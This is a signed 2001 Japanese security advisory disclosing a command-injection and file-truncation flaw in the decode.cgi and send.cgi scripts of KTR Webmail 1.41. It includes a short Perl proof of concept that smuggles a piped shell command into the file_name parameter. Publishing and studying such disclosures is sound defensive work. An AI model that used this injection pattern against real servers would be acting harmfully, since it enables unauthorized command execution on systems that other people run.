-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ====================================================================== CGI PROGRAM SECURITY ADVISORY [KTR Webmail 1.41] 2001/02/04 ====================================================================== http://www.ansi.co.jp/cgi/security/advisories/ktr-webmail_2001_02_04.txt ====================================================================== ■ 影響を受けるCGIプログラム * KTR Webmail 1.41 ■ 概要 KTR Webmail 1.41 は Kotaro 氏によって作成された、WWW 上で動作する MUA です。このプログラムには外部から CGI プログラムの動作権限で任意のファ イルの内容を消去・任意のコマンドを実行可能なセキュリティ上の問題点があ ります。 KTR Webmail: http://www.booboo.ne.jp/~kotaro/ktr.html ■ 解説 KTR Webmail 1.41 に含まれる decode.cgi, send.cgi は外部から与えられる メール番号およびファイル名の汚染チェックを怠っています。 このため、外部から CGI プログラムの実行権限で任意のファイルの内容を消 去 (サイズを0にする) または任意のコマンドの実行が可能です。(任意のコマ ンドが実行可能なため、コマンドを利用して任意のファイルを削除することも 可能です。) これらの攻撃には正しいパスワードが必要ですが、想定される用途を考慮し、 アドバイザリとして公開します。 ■ 影響 CGIプログラムが各ユーザ権限で実行されるシステム (Apache + SuEXEC など) の場合、そのユーザの権限で任意の操作をすることが可能です。これによって ユーザ環境が破壊される可能性があります。そうではない場合でも、CGI プロ グラムの実行 UID で任意の操作が可能です。 ■ 回避方法 KTR Webmail をアンインストールする。 ■ 参考コード #! /usr/bin/perl -w use LWP::Simple; # execcutes command "ls -lR > /tmp/ls-lR" getprint "http://host/ktr1_41/ktr/send.cgi?PASS=01000011010101000101001001000010010101000100010000000001&send_mode=1&AyuMoe&file_name=|ls+-lR+>+/tmp/ls-lR+|"; __END__ ■ 履歴 2001/01/21: 通知 (返答無し) 2001/02/04: 公開 2001/02/21: 参考コードを追加 ====================================================================== (C) 2001 ASUKA NETWORK SERVICE, INC. http://www.ansi.co.jp/ HIRATA YASUYUKI http://yasu.asuka.net/ All rights reserved. * この文書に書かれている内容は無保証です。 * この文書に書かれている内容を利用して攻撃を行った場合、刑事上・民事上 の責任を問われることがあります。 * このファイルは内容の変更 (電子署名の除去を含む) が行われない限り自由 に再配布可能です。 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7rqeCduP2KhBu8ikRAu+0AKDQYApVvRCptrFvl4b8CiAc0TDtiACeOO4y J/pPmUSPQn03e+NofRmA7DeIPwMFATuup4LCitaZXxzdBBEC77QAn30JepJ+rtxt NpSRAQOmyqT6mCXbAJ9X1/A4wWLmkjCQ8qZYhiwh+nqCmA== =Qf61 -----END PGP SIGNATURE-----